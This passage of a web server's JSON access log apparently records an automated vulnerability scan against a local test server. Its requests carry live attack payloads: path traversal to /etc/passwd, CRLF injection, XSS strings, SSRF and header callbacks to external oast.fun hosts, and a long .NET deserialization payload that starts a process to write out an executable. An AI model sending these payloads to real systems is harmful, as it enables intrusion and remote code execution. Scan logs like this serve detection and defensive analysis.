AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlitemanager/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ca2u0eosmpv1jhs80ca09zw1fu8e7j6zf.oast.fun", "http_referer":"http://ca2u0eosmpv1jhs80ca0iefcc13na8pph.oast.fun/ref", "request_method":"GET", "http_x_forwarded_for":"spoofed.ca2u0eosmpv1jhs80ca08irbddtwpubjp.oast.fun"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\x22onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/tenants HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/webapp/login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"url=https://127.0.0.1:443@ca2u0eosmpv1jhs80ca09mi4j47choox1.oast.fun\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugins/servlet/gadgets/makeRequest HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 